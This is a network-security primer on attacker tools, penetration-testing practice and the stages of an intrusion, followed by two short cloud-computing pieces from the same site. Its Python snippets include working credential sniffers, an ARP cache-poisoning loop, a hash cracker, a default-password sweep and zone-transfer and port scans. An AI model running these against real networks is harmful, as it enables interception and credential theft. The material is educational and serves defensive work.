Now that we've concluded a brief introduction to the types of threats faced by both home users and the enterprise, it is time to have a look at some of the tools that attackers use.

Keep in mind that a lot of these tools have legitimate purposes and are very useful to administrators as well. For example I can use a network sniffer to diagnose a low level network problem or I can use it to collect your password. It just depends which shade of hat I choose to wear.

General Network Tools

As surprising as it might sound, some of the most powerful tools, especially in the beginning stages of an attack, are the regular network tools available with most operating systems. For example, an attacker will usually query the 'whois' databases for information on the target. After that he might use 'nslookup' to see if he can transfer the whole contents of their DNS zone (called a zone transfer -- big surprise !!). This will let him identify high-profile targets such as webservers, mailservers, DNS servers etc. He might also be able to figure out what different systems do based on their DNS names -- for example sqlserver.victim.com would most likely be a database server. Other important tools include traceroute to map the network and ping to check which hosts are alive. You should make sure your firewall blocks ping requests and traceroute packets.
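To illustrate how trivial this reconnaissance is to script, the following minimal sketch uses the third-party dnspython library to attempt a zone transfer against every authoritative name server of a domain; the domain shown is a placeholder, and this should only be run against zones you are authorised to test.

```python
import dns.query, dns.resolver, dns.zone   # third-party: dnspython

def try_zone_transfer(domain):
    """Attempt an AXFR (zone transfer) against each authoritative name server."""
    for ns in dns.resolver.resolve(domain, "NS"):
        server = str(ns.target).rstrip(".")
        address = str(dns.resolver.resolve(server, "A")[0])
        try:
            zone = dns.zone.from_xfr(dns.query.xfr(address, domain, timeout=10))
        except Exception:
            print(f"{server}: zone transfer refused (good)")
            continue
        print(f"{server}: zone transfer ALLOWED - exposed records:")
        for name in zone.nodes:
            print("   ", name)

try_zone_transfer("example.com")
```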

Exploits

An exploit is a generic term for the code that actually 'exploits' a vulnerability in a system. The exploit can be a script that causes the target machine to crash in a controlled manner (eg: a buffer overflow) or it could be a program that takes advantage of a misconfiguration.

A 0-day exploit is an exploit that is unknown to the security community as a whole. Since most vulnerabilities are patched within 24 hours, 0-day exploits are the ones that the vendor has not yet released a patch for. Attackers keep large collections of exploits for different systems and different services, so when they attack a network, they find a host running a vulnerable version of some service and then use the relevant exploit.

Port Scanners

Most of you will know what portscanners are. Any system that offers TCP or UDP services will have an open port for that service. For example if you're serving up webpages, you'll likely have TCP port 80 open, FTP is TCP port 20/21, Telnet is TCP 23, SNMP is UDP port 161 and so on.

A portscanner scans a host or a range of hosts to determine what ports are open and what service is running on them. This tells the attacker which systems can be attacked.
For example, if I scan a webserver and find that port 80 is running an old webserver -- IIS/4.0, I can target this system with my collection of exploits for IIS 4. Usually the port scanning will be conducted at the start of the attack, to determine which hosts are interesting.

This is when the attacker is still footprinting the network -- feeling his way around to get an idea of what type of services are offered, what operating systems are in use and so on. One of the best portscanners around is Nmap (https://www.insecure.org/nmap). Nmap runs on just about every operating system, is very versatile in how it lets you scan a system and has many features including OS fingerprinting, service version scanning and stealth scanning. Another popular scanner is Superscan (https://www.foundstone.com), which is only for the Windows platform.
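The underlying technique is simple enough to sketch in a few lines of Python. This is a plain TCP connect() scan of a handful of well-known ports (the target address is a placeholder): the noisiest but most portable approach, and nowhere near as capable as Nmap.

```python
import socket

# Well-known TCP ports and their services (UDP services such as SNMP need a different probe)
COMMON_PORTS = {21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP",
                80: "HTTP", 110: "POP3", 443: "HTTPS", 3389: "RDP"}

def connect_scan(host, ports):
    """Return the ports that accept a full TCP connection."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(1)
            if s.connect_ex((host, port)) == 0:   # 0 means the connection succeeded
                open_ports.append(port)
    return open_ports

for p in connect_scan("192.168.1.10", COMMON_PORTS):
    print(f"{p}/tcp open ({COMMON_PORTS[p]})")
```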

Network Sniffers

A network sniffer puts the computer's NIC (network interface card or LAN card) into 'promiscuous mode'. In this mode, the NIC picks up all the traffic on its subnet regardless of whether it was meant for it or not. Attackers set up sniffers so that they can capture all the network traffic and pull out logins and passwords. The most popular network sniffer is TCPdump as it can be run from the command line -- which is usually the level of access a remote attacker will get. Other popular sniffers are Iris and Ethereal.

When the target network is a switched environment (a network which uses layer 2 switches), a conventional network sniffer will not be of any use. For such cases, the switched-network sniffer Ettercap (http://ettercap.sourceforge.net) and Wireshark (https://www.wireshark.org) are very popular. Such programs are usually run with other hacking-capable applications that allow the attacker to collect passwords, hijack sessions, modify ongoing connections and kill connections. Such programs can even sniff secured communications like SSL (used for secure webpages) and SSH1 (Secure Shell - a remote access service like telnet, but encrypted).
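For illustration only, here is a minimal sniffer written with the third-party Scapy library. It captures a handful of packets in promiscuous mode and prints any payload seen heading to classic cleartext ports; it normally needs root/administrator privileges, and the port list is just an example.

```python
from scapy.all import sniff, TCP, Raw   # third-party: scapy

CLEARTEXT_PORTS = (21, 23, 80, 110)     # FTP, Telnet, HTTP, POP3

def show_cleartext(pkt):
    # Print the first bytes of any unencrypted payload heading to a cleartext service
    if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt[TCP].dport in CLEARTEXT_PORTS:
        print(pkt.summary())
        print(pkt[Raw].load[:120])

# Capture 50 packets on the default interface without storing them in memory
sniff(prn=show_cleartext, store=False, count=50)
```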

Vulnerability Scanners

A vulnerability scanner is like a portscanner on steroids: once it has identified which services are running, it checks the system against a large database of known vulnerabilities and then prepares a report on what security holes are found. The software can be updated to scan for the latest security holes. Unfortunately, these tools are very simple to use, so many script kiddies simply point them at a target machine to find out what they can attack. The most popular ones are Retina (http://www.eeye.com), Nessus (http://www.nessus.org) and GFI LanScan (http://www.gfi.com). These are very useful tools for admins as well, as they can scan their whole network and get a detailed summary of what holes exist.
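Conceptually, a vulnerability scanner is little more than banner grabbing plus a lookup against a vulnerability database, performed on a massive and constantly updated scale. The toy sketch below shows the principle; the "database" is just a hard-coded dictionary of example fingerprints and the host address is a placeholder, so treat it as an illustration rather than a real scanner.

```python
import socket

# Toy "vulnerability database": banner fingerprint -> known weakness (illustrative only)
KNOWN_ISSUES = {
    "vsFTPd 2.3.4":      "Backdoored release (remote shell)",
    "OpenSSH_4.":        "Outdated SSH daemon with multiple published CVEs",
    "Microsoft-IIS/4.0": "End-of-life web server with numerous public exploits",
}

def grab_banner(host, port, timeout=3):
    """Grab whatever the service announces about itself on connection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        if port in (80, 8080):                       # web servers need to be asked first
            s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        return s.recv(1024).decode(errors="replace")

def check(host, ports=(21, 22, 80)):
    for port in ports:
        try:
            banner = grab_banner(host, port)
        except OSError:
            continue                                 # port closed or filtered
        for fingerprint, issue in KNOWN_ISSUES.items():
            if fingerprint in banner:
                print(f"{host}:{port} -> {fingerprint}: {issue}")

check("192.168.1.10")
```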

Password Crackers

Once an attacker has gained some level of access, he/she usually goes after the password file on the relevant machine. In UNIX-like systems this is the /etc/passwd or /etc/shadow file and in Windows it is the SAM database. Once he gets hold of this file, it's usually game over: he runs it through a password cracker that will usually guarantee him further access. Running a password cracker against your own password files can be a scary and enlightening experience. L0phtcrack cracked my old password fR7x!5kK after being left on for just one night !

There are essentially two methods of password cracking :

Dictionary Mode - In this mode, the attacker feeds the cracker a word list of common passwords such as 'abc123' or 'password'. The cracker will try each of these passwords and note where it gets a match. This mode is useful when the attacker knows something about the target. Say I know that the passwords for the servers in your business are the names of Greek Gods (yes Chris, that's a shout-out to you ;)) I can find a dictionary list of Greek God names and run it through the password cracker.

Most attackers have a large collection of wordlists. For example when I do penetration testing work, I usually use common password lists, Indian name lists and a couple of customized lists based on what I know about the company (usually data I pick up from their company website). Many people think that adding on a couple of numbers at the start or end of a password (for example 'superman99') makes the password very difficult to crack. This is a myth as most password crackers have the option of adding numbers to the end of words from the wordlist. While it may take the attacker 30 minutes more to crack your password, it does not make it much more secure.

Brute Force Mode - In this mode, the password cracker will try every possible combination for the password. In other words it will try aaaaa, aaaab, aaaac, aaaad and so on. This method will crack every possible password -- it's just a matter of how long it takes, and it can turn up surprising results because of the power of modern computers. A 5-6 character alphanumeric password is crackable within a matter of a few hours or maybe a few days, depending on the speed of the software and machine. Powerful crackers include L0phtcrack for Windows passwords and John the Ripper for UNIX-style passwords.
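The core of dictionary mode is only a few lines long. The sketch below, using nothing but Python's standard hashlib, checks each candidate word plus the common "word with a couple of digits appended" variations against a target hash. For simplicity it works on a plain MD5 hash; real tools handle the LM/NTLM and UNIX crypt formats found in SAM and /etc/shadow files.

```python
import hashlib

def dictionary_attack(target_hash, wordlist, algo="md5"):
    """Dictionary mode: try each word, its capitalised form, and word+digits variants."""
    for word in wordlist:
        candidates = [word, word.capitalize()]
        candidates += [word + str(n) for n in range(100)]   # defeats 'superman99'-style passwords
        for candidate in candidates:
            if hashlib.new(algo, candidate.encode()).hexdigest() == target_hash:
                return candidate
    return None

# Toy example: recover the password behind the MD5 hash of 'superman99'
target = hashlib.md5(b"superman99").hexdigest()
print(dictionary_attack(target, ["password", "letmein", "superman"]))
```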

For each category, I have listed one or two tools as an example. At the end of this article I will present a more detailed list of tools with descriptions and possible uses.


What is Penetration-Testing?

Penetration testing is basically when you hire (or perform yourself) security consultants to attack your network the way an attacker would do it, and report the results to you enumerating what holes were found, and how to fix them. It's basically breaking into your own network to see how others would do it.

While many admins like to run quick probes and port scans on their systems, this is not a penetration test -- a penetration tester will use a variety of specialised methods and tools from the underground to attempt to gain access to the network. Depending on what level of testing you have asked for, the tester may even go so far as to call up employees and try to social engineer their passwords out of them (social engineering involves fooling a mark into revealing information they should not reveal).

An example of social engineering could be an attacker pretending to be someone from the IT department and asking a user to reset his password. Penetration testing is probably the only honest way to figure out what security problems your network faces. It can be done by an administrator who is security aware, but it is usually better to pay an outside consultant who will do a more thorough job.

I find there's a lack of worthwhile information online about penetration testing -- nobody really goes about describing a good pen test, and what you should and shouldn't do. So I've hand picked a couple of good papers on the subject and then given you a list of my favourite tools, and the way I like to do things in a pen-test.

This is by no means the only way to do things, it's like subnetting -- everyone has their own method -- this is just a systematic approach that works very well as a set of guidelines. Depending on how much information you are given about the targets as well as what level of testing you're allowed to do, this method can be adapted.

Papers Covering Penetration Testing

I consider the following works essential reading for anyone who is interested in performing pen-tests, whether for yourself or if you're planning a career in security:

'Penetration Testing Methodology - For Fun And Profit' - Efrain Tores and LoNoise, you can google for this paper and find it.

'An Approach To Systematic Network Auditing' - Mixter (http://mixter.void.ru)

'Penetration Testing - The Third Party Hacker' - Jessica Lowery. Boy is this ever a good paper ! (https://www.sans.org/rr/papers/index.php?id=264)

'Penetration Testing - Technical Overview' - Timothy P. Layton Sr. also from the www.sans.org (https://www.sans.org) reading room

Pen-test Setup

I don't like working from laptops unless it's absolutely imperative, like when you have to do a test from the inside. For the external tests I use a Windows XP machine with Cygwin (www.cygwin.com) and VMware (www.vmware.com); most Linux exploits compile fine under Cygwin, and if they don't, I shove them into VMware where I have virtual machines of Red Hat, Mandrake and Win2k boxes. In case that doesn't work, the system also dual boots Red Hat 9, and often I'll just work everything out from there.

I feel the advantage of using a Microsoft platform often comes from the fact that 90% of your targets may be Microsoft systems. However, the flexibility under Linux is incomparable; it is truly the OS of choice for any serious hacker, and as a result, for any serious security professional. There is no best OS for penetration testing -- it depends on what you need to test at a point in time. That's one of the main reasons for having so many different operating systems set up, because you're very likely to be switching between them for different tasks.

If I don't have the option of using my own machine, I like to choose any Linux variant.
I keep my pen-tests strictly to the network level; there is no social engineering involved or any real physical access testing other than basic server room security and workstation lockdown (I don't go diving in dumpsters for passwords or scamming employees).

I try as far as possible to determine the Rules Of Engagement with an admin or some other technically adept person with the right authorisation, not a corporate type. This is very important because if you do something that ends up causing trouble on the network, it's going to make you look very unprofessional. It's always better to have it clearly in writing -- this is what you are allowed to do.

I would recommend this even if you're an admin conducting an in-house test. You can get fired just for scanning your own network if its against your corporate policy. If you're an outside tester, offer to allow one of their people to be present for your testing if they want. This is recommended as they will ultimately be fixing most of these problems and being in-house people they will be able to put the results of the test in perspective to the managers.

Tools

I start by visiting the target website, running a whois, a DNS zone transfer (if possible) and other regular techniques to gather as much network and generic information about the target as possible. I also like to pick up names and email addresses of important people in the company -- the CEO, technical contacts etc. You can even run a search in the newsgroups for @victim.com to see all the public news postings they have made. This is useful as a lot of admins frequent bulletin boards for help. All this information goes into a text file. Keeping notes is critically important; it's very easy to forget some minor detail that you should include in your end report.

Now for a part of the arsenal -- not in any order and far from the complete list.

Nmap - Mine (and everyone elses) workhorse port scanner with version scanning, multiple scan types, OS fingerprinting and firewall evasion tricks. When used smartly, Nmap can find any Internet facing host on a network.

Nessus - My favourite free vulnerability scanner; it usually finds something on every host. It's not too stealthy though and will show up in logs (this is something I don't have to worry about too much).

Retina - A very good commercial vulnerability scanner, I stopped using this after I started with nessus but its very very quick and good. Plus its vulnerability database is very up-to-date.

Nikto - This is a webserver vulnerability scanner. I use my own hacked-up version of this Perl program, which uses the libwhisker module. It has quite a few IDS evasion modes and is pretty fast. It is not that subtle though, which is why I modified it to be a bit more stealthy.

Cisco Scanner - This is a small Windows utility I found that scans IP ranges for routers with the default password of 'cisco'. It has turned up some surprising results in the past and just goes to show how even small tools can be very useful. I am planning to write a little script that will scan IP ranges looking for different types of equipment with default passwords.
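A rough sketch of where such a script could start is below: sweep a range, flag hosts answering on a Telnet or web admin port, and grab whatever banner they offer. The network and port list are placeholders, and actually trying default credentials is deliberately left out -- only do that with written authorisation.

    # Default-password sweep, step one: find candidate admin interfaces.
    import ipaddress
    import socket

    NETWORK = "192.168.1.0/24"   # placeholder range
    PORTS = [23, 80]             # Telnet and HTTP admin interfaces

    def grab_banner(ip, port, timeout=2):
        try:
            with socket.create_connection((str(ip), port), timeout=timeout) as sock:
                sock.settimeout(timeout)
                try:
                    return sock.recv(256).decode(errors="replace").strip()
                except socket.timeout:
                    return ""        # open, but silent until we speak first
        except OSError:
            return None              # closed, filtered or unreachable

    for ip in ipaddress.ip_network(NETWORK).hosts():
        for port in PORTS:
            banner = grab_banner(ip, port)
            if banner is not None:
                print(f"{ip}:{port} open  banner: {banner[:60]!r}")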

Sophie Script - A little Perl script, coupled with user2sid and sid2user (two Windows programs), which can find all the usernames on a Windows machine.

Legion - This is a Windows file share scanner by the erstwhile Rhino9 security group. It is fast as hell and allows you to map the drive right from within the software.

Pwdump2 - Dumps the contents of the Windows SAM password file for loading into a password cracker.

L0phtcrack 3.0 - Cracks the passwords I get from the above or from its own internal SAM dump. It can also sniff the network for password hashes or obtain them via remote registry. I have not tried the latest version of the software, but it is very highly rated.

Netcat - This is a TCP/UDP connection backend tool -- oh boy, I am lost without this! Half my scripts rely on it. There is also an encrypted version called Cryptcat, which might be useful if you need to get around an IDS. Netcat can do anything with a TCP or UDP connection, and it serves as my replacement for telnet as well.
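To give a flavour of the plumbing Netcat provides for free, here is a minimal netcat-style TCP client in Python; the host and request line are placeholders only.

    # Connect, send a request, print whatever comes back -- 'nc host 80' in spirit.
    import socket
    import sys

    host, port = "www.example.com", 80
    request = b"HEAD / HTTP/1.0\r\nHost: www.example.com\r\n\r\n"

    with socket.create_connection((host, port), timeout=10) as sock:
        sock.sendall(request)
        while chunk := sock.recv(4096):
            sys.stdout.write(chunk.decode(errors="replace"))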

Hping2 - A custom packet creation utility, great for testing firewall rules among other things.

SuperScan - This is a Windows-based port scanner with a lot of nice options. It's fast, and has a lot of other neat little tools such as NetBIOS enumeration and common utilities like whois, zone transfers etc.

Ettercap - When sniffing a switched network, a conventional network sniffer will not work. Ettercap poisons the ARP cache of the hosts you want to sniff so that they send packets to you and you can sniff them. It also allows you to inject data into connections and kill connections among other things.
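For anyone curious what that ARP cache poisoning looks like on the wire, here is a conceptual sketch using scapy (assumed installed, run as root); the IP and MAC values are placeholders, and this should only ever be pointed at lab machines you are authorised to test.

    # Keep telling the victim that the gateway's IP lives at our MAC address,
    # so its traffic to the gateway flows through us and can be sniffed.
    # (A full man-in-the-middle also poisons the gateway and enables IP forwarding.)
    import time
    from scapy.all import ARP, send

    VICTIM_IP, VICTIM_MAC = "192.168.1.10", "aa:bb:cc:dd:ee:ff"   # placeholders
    GATEWAY_IP = "192.168.1.1"

    while True:
        send(ARP(op=2, pdst=VICTIM_IP, hwdst=VICTIM_MAC, psrc=GATEWAY_IP), verbose=False)
        time.sleep(2)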

Brutus - This is a fairly generic protocol brute-forcing tool. It can brute-force HTTP, FTP, Telnet and many other login authentication systems. This is a Windows tool; on Linux I prefer Hydra.

A Bunch of Common Exploits, Efficiently Sorted

This is my collection of exploits in source and binary form. I sort them into subdirectories by operating system, then by how they attack - Remote / Local - and then by what they attack - BIND / SMTP / HTTP / FTP / SSH etc. The binary filenames are arbitrary, but the source filenames instantly tell me the name of the exploit and the version of the software that is vulnerable.

This is essential when you're short on time and you need to 'pick one'. I don't include DoS or DDoS exploits; nobody I know would authorise you to take down a production system. Don't do it -- tell the client up front that you aren't doing it, and only run that kind of test if they explicitly insist on it in writing.

Presenting Reports

This is the critical part -- it's about presenting what you found to people who probably don't understand a word of what your job is about, other than that you're costing them money. You have to show them that there are specific security problems in their network, and how serious those problems might be.

A lot of people end the pen-test after the scanning stage. Unless someone specifically tells me to stop there, I believe it is important to exploit the system to at least level 1. This matters because there is a very big difference between saying something is vulnerable and actually demonstrating that the vulnerability is exploitable. Not to mention that when dealing with a corporate type, 'I gained access to the server' usually gets more attention than 'the server is vulnerable to blah blah'.

After you're done, write a VERY detailed chronological report of everything you did, including which tools you used, what versions they are, and anything else you did without using tools (e.g. SQL injection). Put the gory technical details in annexes -- make sure the main document has an executive summary and lots of pie charts that they can understand. Try to include figures and statistics wherever you can.

To cater to the admins, provide a report for each host you tested, and make sure that for every security hole you point out you provide a link to a site with a patch or fix. Also try to provide a link to a site with detailed information about the hole, preferably Bugtraq or some other well-known source -- many admins are very interested in these things and appreciate it.


A Brief Walk-through of an Attack

This is an account of how an attacker in the real world might go about trying to exploit your system. There is no fixed way to attack a system, but a large number of attackers will follow a similar methodology, or at least a similar chain of events.

This section assumes that the attacker is moderately skilled and moderately motivated to break into your network. He/she has targeted you for a specific motive -- perhaps you sacked them, or didn't provide adequate customer support (D-Link India, are you listening? ;)). Hopefully this will help you figure out where your network might be attacked, and what an attacker might do once they are on the inside.

Remember that attackers will usually choose the simplest way to get into the network. The path of least resistance principle always applies.

Reconnaissance & Footprinting

Here the attacker will try to gather as much information about your company and network as they can without making a noise. They will first use legitimate channels, such as Google and your company webpage, to find out as much about you as they can. They will look for the following information:


Technical information is a goldmine; things like a webpage to help your employees log in from home will be priceless information to them. So will newsgroup postings by your IT department asking how to set up particular software, as the attacker now knows that you use this software and perhaps knows of a vulnerability in it.

Personal information about the company and its corporate structure. They will want information on the heads of IT departments, the CEO and other people who have a lot of power. They can use this information to forge email, or social engineer information out of subordinates.

Information about your partners. This might be useful information for them if they know you have some sort of network connection to a supplier or partner. They can then include the supplier's systems in their attack, and find a way in to your network from there.

General news. This can be useful information to an attacker as well. If your website says that it is going down for maintenance for some days because you are changing your web server, it might be a clue that the new setup will be in its teething stages and the admins may not have secured it fully yet.

They will also query the whois databases to find out what block of IP addresses you own. This will give them a general idea of where to start their network-level scans.

After this they will start a series of network probes. The most basic of these will determine whether you have a firewall and what it protects. They will try to identify any systems you have that are accessible from the Internet.

The most important targets will be the ones that provide public services. These will be:

Webservers - Usually the front door into the network. All webserver software has some bugs in it, and if you're running home-made CGI scripts such as login pages, they might be vulnerable to techniques such as SQL injection (a short illustration follows this list of targets).

Mail servers - Sendmail is very popular and most versions have at least one serious vulnerability in them. Many IT heads don't like to take down the mail server for maintenance as doing without it is very frustrating for the rest of the company (especially when the CEO doesn't get his mail).

DNS servers - Many implementations of BIND are vulnerable to serious attacks. The DNS server can be used as a base for other attacks, such as redirecting users to other websites etc.

Network infrastructure - Routers and switches may not have been properly secured and may have default passwords or a web administration interface running. Once controlled, they can be used for anything from a simple denial of service attack (by messing up their configurations) to channeling all your data through the attacker's machine to a sniffer.

Database servers - Many database servers have the default sa account password blank and other common misconfigurations. These are very high profile targets as the criminal might be looking to steal anything from your customer list to credit card numbers. As a rule, a database server should never be Internet facing.
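As promised under the web server entry, here is a short, self-contained illustration of the SQL injection risk in a home-made login script. It uses an in-memory SQLite database purely as a stand-in for whatever backend such a script might talk to.

    # A login check built by string concatenation versus a parameterised query.
    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

    user, password = "admin", "' OR '1'='1"   # classic injection string

    # Vulnerable: attacker-controlled input becomes part of the SQL statement.
    unsafe = ("SELECT * FROM users WHERE name = '%s' AND password = '%s'"
              % (user, password))
    print("unsafe query matched:", conn.execute(unsafe).fetchone() is not None)   # True

    # Safe: the driver passes the values separately, so the quotes are just data.
    safe = "SELECT * FROM users WHERE name = ? AND password = ?"
    print("parameterised query matched:",
          conn.execute(safe, (user, password)).fetchone() is not None)            # False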

The more naive of the lot (or the ones who know that security logs are never looked at) may run a vulnerability scanner such as Nessus or Retina over the network. This will ease their work.

Exploitation Phase

After determining which hosts are valid targets and figuring out what OS and version of software they are running (for example, which version of Apache or IIS the web server is running), the attacker can look for an exploit targeting that particular version. For example, if they find you are running an out-of-date version of Sendmail, they will look for an exploit targeting that version or below.

They will first look in their own collection of exploits, because they have tested these. If they cannot find one, they will look to public repositories such as https://www.packetstormsecurity.nl. They will probably choose common exploits, as these are more likely to work and they can probably test them in their own lab.

Once an exploit succeeds, they have already won half the game: they are behind the firewall and can probably see a lot more of the internal network than you ever intended. Many networks tend to be very hard to penetrate from the outside but are woefully unprotected internally. This hard exterior with a mushy interior is a recipe for trouble -- an attacker who penetrates the first line of defense will have the full run of your network.

After getting in, they will also probably install backdoors on this first compromised system to give themselves several ways back in, in case their original hole gets shut down. This is why, when you identify a machine that was broken into, it should be rebuilt from scratch: there is no way of knowing what kind of backdoors might be installed. It can be tricky to find a program that runs itself from 2:00AM to 4:00AM every night and tries to connect to the attacker's machine. Once they have successfully guaranteed their access, the harder part of the intrusion is usually over.

Privilege Escalation Phase

Now the attacker will attempt to increase their security clearance on the network. He/she will usually target the administrator accounts, or perhaps the CEO's account. If they are focused on a specific target (say your database server), they will look for the credentials of anyone with access to that resource. They will most likely set up a network sniffer to capture packets as they cross the network.
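A sniffer of the sort described above can be as simple as the following scapy sketch (scapy assumed installed, run as root); it just watches ports that commonly carry cleartext logins and prints suspicious payloads, which is exactly why such protocols should not be trusted even on an internal network.

    # Watch POP3, FTP and Telnet traffic for cleartext credentials.
    from scapy.all import sniff, IP, Raw

    def show(pkt):
        if pkt.haslayer(IP) and pkt.haslayer(Raw):
            data = pkt[Raw].load
            if b"USER" in data or b"PASS" in data:
                print(pkt[IP].src, "->", pkt[IP].dst, data[:80])

    sniff(filter="tcp port 110 or tcp port 21 or tcp port 23", prn=show, store=False)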

They will also start manually hunting around for documents that will give them some interesting information or leverage. Thus any sensitive documents should be encrypted or stored on systems with no connection to the network. This will be the time they use to explore your internal network.

They will look for Windows machines with file sharing enabled and see what they can get out of these. Chances are that if they didn't come in with a particular objective in mind (for example, stealing a database), they will take whatever information they deem to be useful in some way.

Clean Up Phase

By now the attacker has either found what they were looking for, or is satisfied with the level of access they have. They have made sure that they have multiple paths into the network in case you close the first hole. They will now try to cover up any trace of the intrusion. They will manually edit log files to remove entries about themselves and make sure they hide any programs they have installed in hard-to-find places.

Remember, we are dealing with an intruder who is moderately skilled and is not just interested in defacing your website. They know that the only way to keep access will be if you never know something is amiss. In the event that there is a log they are unable to clean up, they may either take a risk leaving it there, or flood the log with bogus attacks, making it difficult for you to single out the real attack.


Where Can I Find More Information?

Without plugging our site too much, the best place for answers to questions relating to this article is in our forums. The Security/Firewalls forum is the best place for this -- you can ask anything there, from the most basic to the most advanced questions concerning network security. A lot of common questions have already been answered in the forums, so you will quite likely find answers to questions like 'Which firewall should I use?'.

As far as off-site resources are concerned, network security is a vast field and there is seemingly limitless information on the subject. You will not find real information at so-called hacker sites full of programs. The best way to learn about network security is to deal with the first word first -- you should be able to talk networking inside and out, from packet header to checksum, layer 1 to layer 7.

Once you've got that down, you should start on the security aspect. Start by reading a lot of the papers on the net. Take in the basics first, and make sure you keep reading. Wherever possible, try to experiment with what you have read. If you don't have a home lab, you can build one 'virtually'. See the posts in the Cool Software forum about VMware.


Also, start reading security mailing lists such as Bugtraq and security-basics. Initially you may find yourself unable to understand a lot of what happens there, but the newest vulnerabilities are always announced on these lists. If you follow a vulnerability from the time it's discovered to when someone posts an exploit for it, you'll get a very good idea of how the security community works -- and you'll also learn a hell of a lot in the process.

If you're serious about security, it is imperative that you learn a programming language, or at least are able to understand code even if you can't write your own. The best choices are C and assembly language. However, knowing Perl and Python is also valuable, as you can write programs in these languages very quickly.

For now, here are a few links that you can follow for more information:

www.securityfocus.com - A very good site with all the latest news, a very good library and tools collection as well as sections dedicated to basics, intrusion detection, penetration testing etc. Also home of the Bugtraq mailing list.

www.sans.org - A site with excellent resources in its reading room. People who submit papers there are working towards a certification, so it's mostly original material of a very high calibre.

www.security-portal.com - A good general security site.

www.cert.org - The CERT coordination center provides updates on the latest threats and how to deal with them. Also has very good best practice tips for admins.

www.securityfocus.com/archive/1 - This is the link to Bugtraq, the best full disclosure security mailing list on the net. Here all the latest vulnerabilities get discussed way before you see them being exploited or in the press.

www.insecure.org - The mailing lists section has copies of Bugtraq, Full Disclosure, security-basics, security-news etc. Also the home of Nmap, the wonderful port scanner.

seclists.org - This is a direct link to the security lists section of insecure.org.

www.grc.com - For Windows home users and newbies interested in a non-technical site. The site is home to Shields Up, which can test your home connection for file sharing vulnerabilities, do a port scan and more, all online. It can be a slightly melodramatic site at times though.

www.eeye.com - Home of the Retina security scanner, considered the industry leader. The eEye team also works on a lot of the latest vulnerabilities for the Windows platform.

www.nessus.org - Open source vulnerability scanner, and IMNSHO the best one going. If you're a tiger-team penetration tester and you don't point Nessus at a target, you're either really bad at your job or have a very large ego. If there's a vulnerability in a system, Nessus will find it.

www.zonelabs.com - ZoneAlarm personal firewall for Windows, considered the best, and also the market leader.

www.sygate.com - Sygate Personal Firewall, provides more configuration options than ZoneAlarm, but is consequently harder to use.

www.secinf.net - Huge selection of articles, mostly related to Windows security.

www.searchsecurity.com - A TechTarget site which you should sign up for; very good info. Chris writes for its sister site, searchnetworking.com, so I don't think the references could be much better.

www.antioffline.com - A very good library section on buffer overflows etc.

www.packetstormsecurity.nl - The largest selection of tools and exploits possible.


Conclusion

This 5-page article should serve as a simple introduction to network security. The field itself is too massive to cover in any sort of article, and the amount of cutting edge research that goes on really defies comprehension.

Some of the most intelligent minds work in the security field because it can be a very challenging and stimulating environment. If you like to think out-of-the-box and are the sort of person willing to devote large amounts of your time to reading and questioning why things happen in a particular way, security might be a decent career option for you.

Even if you're not interested in it as a career option, every admin should be aware of the threats and the solutions. Remember, you have to think like them to stop them!

If you're interested in network security, we highly recommend you read through the networking and firewall sections of this website. Going through the whole site will be some of the most enlightening time you'll ever spend online.

If you're looking for a quick fix, here are a few of the more important areas that you might want to cover:

Introduction to Networking

Introduction to Firewalls

Introduction to Network Address Translation (NAT)

Denial Of Service (DoS) Attacks

Locking down Windows networks

Introduction to Network Protocols

Also check out our downloads section where you will find lots of very good security and general networking tools.

We plan on putting up a lot of other security articles in the near future. Some will be basic and introductory like this one, while some may deal with very technical research or techniques.

As always feel free to give us feedback and constructive criticism. All flames however will be directed to /dev/null ;)

  • Hits: 61944

Are Cloud-Based Services Overhyped?

In these hard economic times, cloud computing is becoming a more attractive option for many organizations. Industry analyst firm The 451 Group predicts that the marketplace for cloud computing will grow from $8.7bn in revenue in 2010 to $16.7bn by 2013. Accompanying this is an increasing amount of hype about cloud computing.

Cloud computing has gone through different stages, yet because the Internet only began to offer significant bandwidth in the 1990s, it became something for the masses over the last decade. Initial applications were known as Hosted Services. Then the term Application Service Provider emerged, with some hosted offerings known as Managed Services. More recently, in addition to these terms, Software as a Service (SaaS) became a catchphrase.  And as momentum for hosted offerings grew, SaaS is now complemented by Infrastructure as a Service, Platform as a Service, and even Hardware as a Service.

Is this a sign of some radical technology shift, or simply a bit more of what we have seen in the past? 

The answer is both. We are witnessing a great increase in global investment towards hosted offerings. These providers are expected to enjoy accelerated growth as Internet bandwidth becomes ubiquitous, faster, and less expensive; as network devices grow smaller; and as critical mass builds. Also, organizations are moving towards cloud services of all kinds through the use of different types of network devices – take, for example, the rise of smart phones, the iPad tablet, and the coming convergence of television and the Internet.

Yet, although cloud solutions may emerge as dominant winners in some emerging economies, on-premise solutions will remain in use. While start-ups and small businesses might find the cloud to be the cheaper and safer option for their business – enjoying the latest technology without needing to spend money on an IT infrastructure, staff, and other expenses that come with on-premise solutions – larger businesses usually stick to on-premise solutions for both philosophical and practical reasons, such as wishing to retain control and the ability to configure products for their own specific needs.

Gartner's chief security analyst, John Pescatore, for example, believes that cloud security is not enough when it comes to the upper end of the enterprise, financial institutions, and the government. On the other hand, he states that smaller businesses may actually get better security from the cloud. The reason behind this is that while the former has to protect confidential data and cannot pass it on to third parties, the latter is given better security (multiple backup locations, 24/7 monitoring, physical security protecting sites, and more).

Although the cloud might appear to be finding its fertile ground only now, especially in these times of belt-tightening, hosted services have been around for a while. For this reason, when choosing a cloud provider, always make sure you choose a company that has proven itself in the marketplace.

 

  • Hits: 12931

What if it Rains in the Cloud?

Cloud computing has become a cost-effective model for small and medium-sized enterprises (SMEs) that wish to use the latest technology on demand, with no commitments or need to purchase and manage software products. These features have made hosted services an attractive choice, such that industry analyst firm The 451 Group has predicted the marketplace for cloud computing will grow from $8.7 billion in revenue in 2010 to $16.7 billion by 2013.

Yet many organizations think twice when it comes to entrusting their data to third parties. Let's face it, almost every web user has an account on sites such as Gmail or Facebook – where personal information is stored on servers the user does not control; but when it comes to businesses allowing corporate data to go through third parties, the danger and implications are greater, as an error affects a whole system, not just a single individual.

